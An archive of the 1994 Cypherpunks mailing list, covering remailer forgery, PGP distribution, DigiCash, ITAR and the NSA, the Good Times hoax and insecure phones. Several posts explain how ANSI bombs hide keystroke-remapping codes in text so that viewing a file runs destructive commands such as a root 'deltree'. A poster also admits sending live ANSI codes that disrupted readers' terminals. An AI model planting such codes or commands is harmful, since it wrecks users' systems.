W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From dmandl at bear.com Wed Dec 7 13:04:25 1994
From: dmandl at bear.com (dmandl at bear.com)
Date: Wed, 7 Dec 94 13:04:25 PST
Subject: Warning about a message I may have sent
Message-ID: <9412072102.AA18703@yeti.bsnet>

> From:
>
> I may have accidentally sent a message to the list that I was
> intending to send just to myself, from my offline mailer Eudora (as
> opposed to elm, which I'm now on).

[...]

> If it arrives, it's the text only version of a paper submitted to the
> "Imagina 95" conference to be held in February in Monte Carlo.

Sorry, Tim, but if it's not digitally signed by you with a valid key, that baby's up for grabs. Monte Carlo here I come...
--Dave.

From greg at ideath.goldenbear.com Wed Dec 7 13:20:26 1994
From: greg at ideath.goldenbear.com (Greg Broiles)
Date: Wed, 7 Dec 94 13:20:26 PST
Subject: Remailers and "##"
In-Reply-To: <199412071922.AA13633@xtropia>
Message-ID: <199412072119.AA11687@ideath.goldenbear.com>

-----BEGIN PGP SIGNED MESSAGE-----

X-To: sq0nk at alt.anonymous.messages

>most remailers will not let you set the From: line this way.
>could one of the remailer operators tell us why?
>it doesn't make sense to me.

I'm not going to install remailer software that would allow this because it'd make it even easier to post messages under someone else's name. I think that's rude and I'm not going to help other people do it. I think it's fine for people to refuse to identify themselves or to identify themselves with multiple names, but I don't like people using other folks' names, esp. in text-based media where the notions of "identity" and "author" are awfully slippery in the first place.

(Yes, I am aware that it's trivial to forge messages, and that widespread use of digital signatures would make the From: line essentially meaningless.)

From jim at acm.org Wed Dec 7 13:38:39 1994
From: jim at acm.org (Jim Gillogly)
Date: Wed, 7 Dec 94 13:38:39 PST
Subject: PGP 2.6.2
In-Reply-To: <94120808041708@nzdairy.co.nz>
Message-ID: <9412072134.AA26120@mycroft.rand.org>

> Tony.Gurnick at nzdairy.co.nz (DNA) writes:
> I'm looking for an ftp site for pgp 2.6.2 or greater
> outside of the us. I've tried ftp.dsi.unimi.it but
> they only have 2.6.1.

It's dated 7 Nov in ftp.ox.ac.uk:pub/crypto/pgp/* -- is that earlier than MIT got it?

Jim Gillogly
Highday, 17 Foreyule S.R. 1994, 21:32

From rishab at dxm.ernet.in Wed Dec 7 14:22:14 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Wed, 7 Dec 94 14:22:14 PST
Subject: Successful use of e-cash!
Message-ID:

I just made my first e-cash transaction. Using SLIP and Netscape, I webbed to HotWired to buy a sneak preview of Bruce Sterling's Prague story to appear in the Jan issue for 0.50 cyberbucks.

At the same time, I ran the e-cash client (for Windows) from DigiCash. It has a beautiful interface - just a few little icons visible on the screen; it went to the back, asked me for my password to open my account, found out what my balance was, and asked me whether I wanted to withdraw $10 from the total of $100. I said yes.

Meanwhile I asked HotWired to send me the Sterling piece. Unfortunately it was too quick - it came in on port (something) before the e-cash client had filled my wallet; I tried again at HotWired, by which time the e-cash status showed $10. My cyberwallet made a nice clanging sound, asked me whether I wanted to pay "Wired Ecash Shop" $0.50, and whether I wanted to set a payment policy. I'm so smart - I told the client to automatically pay "Wired Ecash Shop" if it asked for less than $2 up to 10 times.

Ouch! Now I can't go back up my Web trail! When I went one step back at HotWired, for some reason it ran the e-cash 'charge?' URL, and so 'clang' went my wallet and automatically deducted another 50c! Oops. Oh well, the whole experience was worth a whole cyberdollar.

I also 'bought' Chaum's SciAm article, and got the reasonably lengthy list of shops. Then I noticed it was 4 in the morning...
Rishab

"We know everything about you that we need to know" - Coleta Brueck, IRS
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh              "In between the breaths is
rishab at dxm.ernet.in            the space where we live"
rishab at arbornet.org                  - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335        H 34C Saket, New Delhi 110017, INDIA

From Tony.Gurnick at nzdairy.co.nz Wed Dec 7 14:44:14 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Wed, 7 Dec 94 14:44:14 PST
Subject: Breaking the NSA
Message-ID: <94120811311055@nzdairy.co.nz>

If you really want to test NSA. Encrypt some crypto code
with pgp in an overseas public key(IE: non-us) then email the
code to someone out of the us. This way you will find out 1 of 2
things.

  1. That pgp is unbreakable by the NSA
     - Rsa with fairly long keys take so much work the nsa
       can't crack it with huge computers. This is a good
       thing

     - Idea, even though it is new, is a secure algorithm
       for the above reasons

     - You won't get in trouble as you are only sending
       random bits out of the country not code

  2. PGP is BREAKABLE by the NSA (OUCH!)
     - You get in deep shit!

  or

  3. PGP is breakable by the NSA but they don't tell anyone! (HMMM)

     - Well this would be an interesting one!

     - Since they are the ones that imposed the ITAR rule in the
       first place (them or the us gov) they have a prob! If
       they knew you were exporting crypto because they cracked
       pgp they could not convict you as that would imply they cracked
       pgp and they would tell the whole world what they can &
       cannot crack. It would be a big bummer for RSA and IDEA
       but at least we'd know!

T

From storm at marlin.ssnet.com Wed Dec 7 15:00:26 1994
From: storm at marlin.ssnet.com (Don Melvin)
Date: Wed, 7 Dec 94 15:00:26 PST
Subject: Announcing - The DigitaLiberty Forum
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , you wrote:
> > *** Who can join DigitaLiberty?
> >
> > The DigitaLiberty Forum is open to anyone that can honestly answer yes to the
> > following two questions:
> >
> > 1) I renounce the use of coercive force as a tool of social or economic
> > policy.
>
> well, i guess i can't join! as a grad student all of you pay me (or my
> advisor i should say) to learn how to cure all of this worlds awful
> diseases...right.

Same here. Except a bit of money I earned working in a video store, most every dollar I've gotten since 1981 has been from the Feds, directly or indirectly (FDIC, U.S.P.S., and gov't contractors). As a software engineer, the U.S. government is too large a market to ignore.

I just look at it as my personal program of wealth re-distribution. Every dollar that goes to me (for value well received, I might add) is one that won't go to bolster rewards for incompetency and laziness.

- --
America - a country so rich and so strong we can reward the lazy and
punish the productive and still survive (so far)

Don Melvin    storm at ssnet.com    finger for PGP key.

From loki at nately.UCSD.EDU Wed Dec 7 15:02:09 1994
From: loki at nately.UCSD.EDU (Lance Cottrell)
Date: Wed, 7 Dec 94 15:02:09 PST
Subject: Pr0duct Cypher: PGPtools.
Message-ID: <9412072240.AA28355@nately.UCSD.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

The error you mentioned is not my problem. I got the fix when I got PGPTools. I would really like you to look at the code I am using. Do you still have access to a Linux box?

This communication with you using public groups and lists is a waste of bandwidth, and very slow. Could you send me an anonymous reply block?
It is going to take forever for you to guess what my problem is without being able to look at the code directly, and I do not want to post the whole thing to cypherpunks.

- ----------------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server.

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
--Nietzsche
- ----------------------------------------------------------

From adam at bwh.harvard.edu Wed Dec 7 15:02:54 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Wed, 7 Dec 94 15:02:54 PST
Subject: Breaking the NSA
In-Reply-To: <94120811311055@nzdairy.co.nz>
Message-ID: <199412072305.SAA02362@hermes.bwh.harvard.edu>

The NSA will not tell anyone if they can break RSA or IDEA. Read the Codebreakers; they went through all sorts of contortions to not let the Japanese know we had broken Purple.

They may send the IRS, EPA, and other agencies after you to harass you, but they wouldn't tell you just because you sent code out of the country. Alternately, they'll bug your computer, and claim that's how they broke things.

Adam

| If you really want to test NSA. Encrypt some crypto code
| with pgp in an overseas public key(IE: non-us) then email the
| code to someone out of the us. This way you will find out 1 of 2
| things.

| 3. PGP is breakable by the NSA but they don't tell anyone! (HMMM)
|
|    - Well this would be an interesting one!
|
|    - Since they are the ones that imposed the ITAR rule in the
|      first place (them or the us gov) they have a prob! If
|      they knew you were exporting crypto because they cracked
|      pgp they could not convict you as that would imply they cracked
|      pgp and they would tell the whole world what they can &
|      cannot crack. It would be a big bummer for RSA and IDEA
|      but at least we'd know!

From grendel at netaxs.com Wed Dec 7 15:11:03 1994
From: grendel at netaxs.com (Michael Handler)
Date: Wed, 7 Dec 94 15:11:03 PST
Subject: Anybody got a procmail recipe?
In-Reply-To:
Message-ID:

On Wed, 7 Dec 1994, Samuel Kaplin wrote:

> Does anyone have a procmail recipe which will forward all incoming mail
> messages to a shell account to a specific usenet news group?

Quick and dirty:

    :1:
    ^TO*@*
    ! group-name at cs.utexas.edu

There's probably a better way, but that will work.

--
Michael Handler                               Philadelphia, PA
Civil Liberty Through Complex Mathematics     s.s.y.g-l-b co-moderator
You're only as elegant as your actions let you be

From roy at cybrspc.mn.org Wed Dec 7 15:21:50 1994
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 7 Dec 94 15:21:50 PST
Subject: ANSI Bombs are still a threat? (was: Re: Good times virus (ANSI BOMB?))
In-Reply-To: <199412070742.CAA21434@bb.hks.net>
Message-ID: <941207.163507.7y7.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, adam.philipp at ties.org writes:

> Although the concept of "text viruses" seems a bit far fetched to some
> people, there these lovely toys known as ANSI bombs. Essentially they work
> in a similar method to the some techniques used in the sendmail bug, but
> they are MS-DOS specific, they will use embedded ANSI codes to run programs
> as the files is viewed...

The MS-DOS ANSI bomb relies on the capability of redefining keystrokes through the ANSI screen driver. Most all the DOS boxen I lay hands on lose this capability quickly, when I install more capable ANSI drivers that have this misfeature disabled.
Fortunately, few people rely on ANSI-based text viewers, so I'd hope that even the otherwise unprotected machines have some immunity. (how many people use 'type filename' anymore?)

I first learned of ANSI bombs back in the Cretaceous period (1989), when it briefly became popular to slip them into PKZIP 0.92 comment fields. I even saw a couple in files I downloaded, because even then I had removed the function from my screen driver. The attempted redefs would show up as plain text.

> If anyone feels the need for proof I collected a few a while back, but
> really don't see the need to post them...heh heh.

I wonder if anyone's mail readers are even susceptible? (he said, grinning)

- --
Roy M. Silvernail [ ] roy at cybrspc.mn.org
PGP public key available by mail
echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org
These are, of course, my opinions (and my machines)

From VAMAGUS at delphi.com Wed Dec 7 15:42:25 1994
From: VAMAGUS at delphi.com (VAMAGUS at delphi.com)
Date: Wed, 7 Dec 94 15:42:25 PST
Subject: Breaking the NSA
Message-ID: <01HKDEMI4HUQ91ZPHN@delphi.com>

-----BEGIN PGP SIGNED MESSAGE-----

Tony.Gurnick at nzdairy.co.nz wrote:

>If you really want to test NSA. Encrypt some crypto code
>with pgp in an overseas public key(IE: non-us) then email the
>code to someone out of the us. This way you will find out 1 of 2
>things.
> 1. That pgp is unbreakable by the NSA
>    - Rsa with fairly long keys take so much work the nsa
>      can't crack it with huge computers. This is a good
>      thing

Not that easy. They would just crack the code and *another* acronym based agency would come up with a different reason to seize you and your computer.
It would seem unrelated to anyone but *you* since you would know what you did but would have no way to prove that your original infraction is why you are doin' time. Hope that makes some sense.

>
>    - Idea, even though it is new, is a secure algorithm
>      for the above reasons
>

Same argument...no one would ever know either way. Until you got out in about 100 years.

>
>    - You won't get in trouble as you are only sending
>      random bits out of the country not code

If it isn't something *really good* they probably wouldn't come after you anyway.

>
> 2. PGP is BREAKABLE by the NSA (OUCH!)
>    - You get in deep shit!
>
>
> or
>
> 3. PGP is breakable by the NSA but they don't tell anyone! (HMMM)

#3 I can agree with. I don't think that NSA would tip their hand and let on to us that they can read our stuff. At least, not directly.

>
>    - Well this would be an interesting one!
>
>    - Since they are the ones that imposed the ITAR rule in the
>      first place (them or the us gov) they have a prob! If
>      they knew you were exporting crypto because they cracked
>      pgp they could not convict you as that would imply they cracked
>      pgp and they would tell the whole world what they can &
>      cannot crack. It would be a big bummer for RSA and IDEA
>      but at least we'd know!

One more thing. Don't you think that they subscribe to the Cypherpunk list just to see this kind of logic?

BTW....I ain't one of 'em, and I wouldn't tell if I was. :)

***************************Frenchie Sends*******************************
* PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. *
* As soon as any man says of the affairs of the state *
* "What does it matter to me?" the state may be given up for lost. *
* J.J.Rousseau - The Social Contract *
* PGP info: email to mail-server at mit.edu with first line of message: *
* send pub/usenet/alt.security.pgp/* *
*****************************J. Francois********************************

From dave at esi.COM.AU Wed Dec 7 15:43:03 1994
From: dave at esi.COM.AU (Dave Horsfall)
Date: Wed, 7 Dec 94 15:43:03 PST
Subject: (Fwd) Read this, Virus info!!
In-Reply-To: <199412070447.XAA18944@bb.hks.net>
Message-ID:

It's a hoax. Although, like a virus, this bloody warning has been infecting dozens of mailing lists...

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From farr at evtech.com Wed Dec 7 15:55:27 1994
From: farr at evtech.com (Rebecca Farr x260)
Date: Wed, 7 Dec 94 15:55:27 PST
Subject: crypto email to France
Message-ID: <9412072357.AA00829@chuckwala>

Hello -

My company would like to be able to send encrypted mail to our office in Paris. Strictly inter-company stuff, using PGP for example. I know we can buy PGP here, and get it off the net in Europe, thereby avoiding exporting the technology in either direction...

I've been told by someone here in the US that France wants control of any use of encryption software including sending email. I've also been told by someone in France that the agency in France is the Service Central de la Securite des Systemes d'Information (SCSSI), and that they want companies to register with them for use of cryptographic software.

I've read what I can find on the net about legalities of using encryption software, and everything concerning Europe (what little there is) is quite vague. Does anyone here know any details or where I might find out more about what, if anything, needs to be done to legally exchange encrypted email with our office in Paris?

Thanks very much!
Best Regards, Rebecca Farr Evolutionary Technologies, Inc. Systems Administration Group 4301 Westbank Dr. Bldg. B, Suite 100 Austin, TX 778746 phone: 512-327-6994 x260 fax: 512-327-6117 email: farr at evtech.com From greg at ideath.goldenbear.com Wed Dec 7 15:59:00 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Wed, 7 Dec 94 15:59:00 PST Subject: Bad PGP sig on 'Remailers and ##' Message-ID: <199412072358.AA14528@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Earlier I wrote: > I'm not going to install remailer software that would allow this > because it'd make it even easier to post messages under someone > else's name. [...] but the PGP sig on the message was bad, apparently because nn stuck an extra X-To: line in the message. Ugh. Anyway, I said it, and meant to say it. Thanks to the c-punk who caught that & sent me mail. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuZLpX3YhjZY3fMNAQHJWAP+Mk6jSgxGl5zpFDblnUeEfa94YtDaCNxr j9EWgI2lQzSsEqO2e5JRohBmXlQGxs8aPiKl3wGsRAcYAO6kYV3xfTQOfDbifT+9 sFP5/1wgO7I4cM3EdDgVtM7bYHUR44QebN/ONQxdDWi2+ErVfWh/PPR1u9DR2+wd c0v7rIRuuZc= =OvHk -----END PGP SIGNATURE----- -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | greg at goldenbear.com every temptation, every desire, every inhibition." | -- Antonin Artaud | @! From jrochkin at cs.oberlin.edu Wed Dec 7 16:02:42 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Wed, 7 Dec 94 16:02:42 PST Subject: Breaking the NSA Message-ID: At 6:31 PM 12/07/94, DNA wrote: >If you really want to test NSA. Encrypt some crypto code >with pgp in an overseas public key(IE: non-us) then email the >code to someone out of the us. This way you will find out 1 of 2 >things. > 1. That pgp is unbreakable by the NSA > - Rsa with fairly log keys take so much work the nsa > cant crack it with huge computers. 
This is a good > thing Nah, no possible result would tell you this. Perhaps PGP is "breakable", in that it takes something like 30 seconds of their computer time to break, say. But even 30 seconds would probably be too much time to spend on _every_ single piece of email that crosses national borders. From Tony.Gurnick at nzdairy.co.nz Wed Dec 7 17:13:22 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 7 Dec 94 17:13:22 PST Subject: Breaking the NSA Message-ID: <94120814043304@nzdairy.co.nz> Frenchie Wrote Not that easy. They would just crack the code and *another* acronym based agency would come up with a different reason to seize you and your computer. It would seem unrelated to anyone but *you* since you would know what you did but would have no way to prove that your original infraction is why you are doin' time. Hope that makes some sense. Maybe. What if the only way to do this was illegal? If it isn't something *really good* they probably wouldn't come after you anyway. Whats the definition of GOOD? #3 I can agree with. I don't think that NSA would tip their hand and let on to us that they can read our stuff. At least, not directly. We may as well find out. One more thing. Don't you think that they subscribe to the Cypherpunk list just to see this kind of logic? Maybe, But isnt freedom of speech what this list is about and what your constitution does! BTW....I ain't one of 'em, and I wouldn't tell if I was. :) Prove it T From VAMAGUS at delphi.com Wed Dec 7 18:22:42 1994 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Wed, 7 Dec 94 18:22:42 PST Subject: Breaking the NSA Message-ID: <01HKDJYCJYWI90QNJL@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- Tony.Gurnick at nzdairy.co.nz wrote: >Frenchie Wrote > > Not that easy. They would just crack the code and *another* > acronym based agency would come up with a different reason to > seize you and your computer. 
It would seem unrelated to anyone
> but *you* since you would know what you did but would have no
> way to prove that your original infraction is why you are doin'
> time. Hope that makes some sense.
>
>Maybe. What if the only way to do this was illegal?

Then you would have to hope you never do anything illegal. Then no (pick your acronym) agency would be able to easily trump up a charge that could be used as an infiltration technique to get to your system *legally*. If they want to bad enuff I'm sure breaking the law to catch you doing something would be arranged. Violating National Interests maybe?

> If it isn't something *really good* they probably wouldn't come after
> you anyway.
>What's the definition of GOOD?

PGP?...3xDES?....RC5?....plans for an A-Bomb with instructions for construction and location of available nuclear material?...pick one.

> #3 I can agree with. I don't think that NSA would tip their hand
> and let on to us that they can read our stuff. At least, not directly.
>We may as well find out.

Agreed, the problem is finding a way to be sure! A little misinformation has a habit of going a long way.

> One more thing. Don't you think that they subscribe to the Cypherpunk
> list just to see this kind of logic?
>Maybe, But isn't freedom of speech what this list is about and what your
>constitution does!

Be careful...not everyone here is a U.S. resident or citizen. At least I don't think so. But since I am I know how precariously balanced the definition of free speech is. The Supreme Court in cahoots with law enforcement and lawmakers could change things pretty quick! Throw in a handy list of names......u know the rest.

> BTW....I ain't one of 'em, and I wouldn't tell if I was. :)
>Prove it

[I see my smiley was disregarded]

Proof you say!
A classical dilemma:
If I say I am (one of them) it implies gathering intelligence or a reason to sow suspicion even if I am not. Denial implies I am what I say I am not.
So, even though I am not, it would be impossible to *convince* you of that. If I was I still couldn't produce *believable* evidence to support the statement.
Take my advice: Don't Trust Nobody.

***************************Frenchie Sends*******************************
* PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. *
* As soon as any man says of the affairs of the state *
* "What does it matter to me?" the state may be given up for lost. *
* J.J.Rousseau - The Social Contract *
* PGP info: email to mail-server at mit.edu with first line of message: *
* send pub/usenet/alt.security.pgp/* *
*****************************J. Francois********************************

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

Is there a reason *you* don't sign your messages? Hehehe.... :)

From ianf at sydney.sgi.com Wed Dec 7 19:11:58 1994
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Wed, 7 Dec 94 19:11:58 PST
Subject: Breaking the NSA
In-Reply-To: <94120811311055@nzdairy.co.nz>
Message-ID: <9412081408.ZM999@wiley.sydney.sgi.com>

On Dec 8, 11:31am, DNA wrote:
> If you really want to test NSA. Encrypt some crypto code
> with pgp in an overseas public key(IE: non-us) then email the
> code to someone out of the us. This way you will find out 1 of 2
> things. [...]

I am told that a similar trick was tried by some people back in the early 1980's, when they were trying to figure out if the NSA could indeed break DES. There was no official response to these attempts.

Ian.

From entropy at IntNet.net Wed Dec 7 21:44:30 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 7 Dec 94 21:44:30 PST
Subject: Moto Secure Clear digital?
In-Reply-To: <9412040430.AA29360@unicycle.cs.tulane.edu>
Message-ID:

> I just got a second phone line, and decided that if I was going to get a 2-line
> phone it might as well be a good one, so I am considering a Motorola Secure
> Clear cordless 2-line phone with speakerphone. This will be quite an investment, so I was wondering whether the Secure Clear phones are digitally encrypted or
> merely scrambled using some analog method. Anybody know about this? How secure
> are these phones really? --Wes

As I understand it the system is a cheezy form of frequency inversion. It'll stop your neighbors with a scanner, but that's about it.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )

From entropy at IntNet.net Wed Dec 7 21:46:57 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Wed, 7 Dec 94 21:46:57 PST
Subject: NYT on Insecure Phones
In-Reply-To: <199412040432.XAA13619@bb.hks.net>
Message-ID:

> It's worse than that! They will allow customers to use their service
> in NYC, I'm told by a customer of theirs visiting this weekend, if
> they pay for the call with a credit card (IE, VISA, MC, etc) that they
> must *give* *an* *operator* *over* *the* *cellphone*.

Cell1 is just not incredibly smart about security, physical or otherwise. An acquaintance of mine found a "Fraud Alert Bulletin" in a Cellular One trash can which warned about the dangers of not shredding your trash. Of course, in the same bag was wads of credit card info, NAM & ESN info, etc.

=jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )

From alano at teleport.com Wed Dec 7 21:54:22 1994
From: alano at teleport.com (Alan Olsen)
Date: Wed, 7 Dec 94 21:54:22 PST
Subject: (Fwd) Read this, Virus info!!
Message-ID: <199412080554.VAA23477@desiree.teleport.com>

>I have received two versions of this warning about "Good Times"
>virus, this one from mail list Design-L and a similar one from
>list Fiction-of-Philosophy. Some forwarded headers have been
>removed from this version.
>
>Has anyone on c'punks got further info or comment?

Yes. It is a hoax. (I will obtain the debunking message from one of the virus echos if needed...)

It was designed to prey on the gullibility of AOL users. (You cannot make a mail message that will virus your system just by READING it. AOL does not have support for nam-shubs.)

| "Encryption ROT13s your mind." | alano at teleport.com |
|"Would you rather be tortured by the government | Disclaimer: |
|forces or the people's liberation army?" -mklprc | Ignore the man |
| -- PGP 2.6.2 key available on request -- | behind the keyboard.|

From rsalz at osf.org Wed Dec 7 22:03:36 1994
From: rsalz at osf.org (Rich Salz)
Date: Wed, 7 Dec 94 22:03:36 PST
Subject: crypto email to France
Message-ID: <9412080559.AA05774@sulphur.osf.org>

Have your French office contact the American Consulate as a way of getting started.

I believe the short and effective (albeit not 100% correct) answer is that digital privacy is not allowed unless you give the gov't the keys.

/r$

From merriman at metronet.com Wed Dec 7 22:26:54 1994
From: merriman at metronet.com (David K. Merriman)
Date: Wed, 7 Dec 94 22:26:54 PST
Subject: Breaking the NSA
Message-ID: <199412080627.AA02280@metronet.com>

-----BEGIN PGP SIGNED MESSAGE-----

>
>Frenchie Wrote
>
> Not that easy. They would just crack the code and *another*
> acronym based agency would come up with a different reason to
> seize you and your computer. It would seem unrelated to anyone
> but *you* since you would know what you did but would have no
> way to prove that your original infraction is why you are doin'
> time. Hope that makes some sense.
>
>Maybe. What if the only way to do this was illegal?

Since when has that really stopped them? Or even slowed them down noticeably?

>
>
> If it isn't something *really good* they probably wouldn't come after
> you anyway.
>
>What's the definition of GOOD?

How about.... the Skipjack algorithm :-)

>
> #3 I can agree with. I don't think that NSA would tip their hand
> and let on to us that they can read our stuff. At least not directly.
>
>We may as well find out.

Knock yourself out. I got no desire to be Bubba's love toy.....

>
> One more thing. Don't you think that they subscribe to the Cypherpunk
> list just to see this kind of logic?
>
>
>Maybe But isn't freedom of speech what this list is about and what your
>constitution does!

Granted that's what the U.S. Constitution _started out_ as - no telling where things will end :-(

>
>
>
> BTW....I ain't one of 'em and I wouldn't tell if I was. :)
>
>Prove it

Ri-i-i-i-i-ght!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From roy at cybrspc.mn.org Wed Dec 7 22:27:07 1994
From: roy at cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 7 Dec 94 22:27:07 PST
Subject: My apologies to the list (Re: ANSI Bombs are still a threat?)
In-Reply-To: <941207.163507.7y7.rusnews.w165w@cybrspc.mn.org>
Message-ID: <941207.234039.2D7.rusnews.w165w@cybrspc.mn.org>

-----BEGIN PGP SIGNED MESSAGE-----

In trying to be too terribly clever, I included a bit of ANSI commands in my last post to the list. At least one person has suffered grievous harm to his telnet session as a result.

That person asks that I post instructions for recovering from so heinous an attack. All I can suggest is escaping to a shell and doing a 'clear' (or, under MS-DOS, 'cls').

Sorry, folks. I won't do that again.

- --
Roy M. Silvernail -- roy at cybrspc.mn.org
"Usenet: It's all fun and games until somebody loses an eye."
--Jason Kastner

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From claborne at microcosm.sandiegoca.NCR.COM Wed Dec 7 22:33:01 1994
From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris)
Date: Wed, 7 Dec 94 22:33:01 PST
Subject: Good times virus (ANSI BOMB?)
Message-ID: <2EE69EFD@microcosm.SanDiegoCA.NCR.COM>

Can't be too UNIX centric. With the advent of MS Mail and CC:Mail that have SMTP gateways, they automagically convert uuencoded files to attachments in the native format. That is, when you send me a message with a uuencoded file at the end, my mail gateway uudecodes and puts the attachment in my mail message as a clickable icon. NOW, all you got to do is convince me to double click on this (virus exe) and bingo!, I'm dead.

Question: Has anyone tried to infect or destroy an NT box with some known virus? NT's security model could prevent this (I.E. trying to write to a restricted file or stay resident...). But I'm not sure what is secured since almost all users use NT workstation as "Administrator".

2
-- C --

>---------------------------------------------------------------------------
---
>-----BEGIN PGP SIGNED MESSAGE-----
>
>>On Dec 7, 1:04am, ADAM GERSTEIN, _THE_ MACGURU wrote:
>>> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm"
>>mean
>>> anything to you?
Sure, it wasn't actual email, but it did use email and
>other
>>> means of transport to cripple the net in a matter of hours.
>>
>>The Internet Worm used the sendmail DEBUG mode to execute commands on
>>a remote system. It did not propagate itself via email messages, which was
>>what the original (ridiculous) warning claimed.
>>
>>I can't feel a lot of sympathy for people who took this announcement
>>seriously. Such stupidity reaps its own rewards.
>
>Although the concept of "text viruses" seems a bit far fetched to some
>people, there are these lovely toys known as ANSI bombs. Essentially they work
>in a similar method to some techniques used in the sendmail bug, but
>they are MS-DOS specific, they will use embedded ANSI codes to run programs
>as the file is viewed... anyone know what will happen if deltree /XXX
>(where XXX represents an unpublished string of characters) is run from the
>root directory of a DOS hard disk? It's gone, quickly. Sure the files can be
>undeleted, but undeleting a whole disk is tricky business...
>
>Maybe Good Times is a hoax, but ANSI bombs exist and using a DOS ANSI text
>viewer will surely be a foolish thing to do on any downloaded text file...
>
>If anyone feels the need for proof I collected a few a while back, but
>really don't see the need to post them...heh heh.
>
> Adam Philipp
>
>PS: Please no comments about superiority of MACs or LINUX boxes because they
>are immune to ANSI bombs...that ought to be clear enough...
>
>- --
>PGP Key available on the keyservers. Encrypted E-mail welcome.
>
>SUB ROSA: Confidential, secret, not for publication.
> -Black's Law Dictionary
>
>GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+ UU+ US+ P+ 3 E N++ k- W++ M-- V
>po- Y++ t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u** h-- f++ r+ n+ y++--
>
>- ---
>[This message has been signed by an auto-signing service. A valid signature
>means only that it has been received at the address corresponding to the
>signature and forwarded.]
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Gratis auto-signing service
>
>-----END PGP SIGNATURE-----
>

From tony at secapl.com Thu Dec 8 06:17:48 1994
From: tony at secapl.com (Anthony Wm. Iannotti)
Date: Thu, 8 Dec 94 06:17:48 PST
Subject: ANSI Bombs are still a threat? (was: Re: Good times virus (ANSI BOMB?))
In-Reply-To: <941207.163507.7y7.rusnews.w165w@cybrspc.mn.org>
Message-ID:

On Wed, 7 Dec 1994, Roy M. Silvernail wrote:

> I wonder if anyone's mail readers are even susceptible? (he
> said, grinning)

This code altered my screen running Pine 3.89 on an X-terminal hung off an RS/6000 running AIX 3.2.5, much to my surprise!

_________________________________________________________________________
Anthony Wm. Iannotti, Network Manager Security APL 101 Hudson Street 201/332-2020 Jersey City, NJ 07302 tony at secapl.com

From Paul.Foley at vuw.ac.nz Thu Dec 8 06:40:36 1994
From: Paul.Foley at vuw.ac.nz (Paul Foley)
Date: Thu, 8 Dec 94 06:40:36 PST
Subject: DigiCash
Message-ID: <199412081440.DAA03825@akeake.its.vuw.ac.nz>

Could someone explain the concept of "DigiCash" to me, or tell me where to get info from?

Thanks.

From meconlen at IntNet.net Thu Dec 8 07:50:17 1994
From: meconlen at IntNet.net (Michael Conlen)
Date: Thu, 8 Dec 94 07:50:17 PST
Subject: Moto Secure Clear digital?
In-Reply-To:
Message-ID:

On Thu, 8 Dec 1994, Jonathan Cooper wrote:

> > I just got a second phone line, and decided that if I was going to get a 2-line
> > phone it might as well be a good one, so I am considering a Motorola Secure
> > Clear cordless 2-line phone with speakerphone. This will be quite an investment, so I was wondering whether the Secure Clear phones are digitally encrypted or
> > merely scrambled using some analog method. Anybody know about this? How secure
> > are these phones really?
--Wes
>
> As I understand it the system is a cheezy form of frequency
> inversion. It'll stop your neighbors with a scanner, but that's about it.

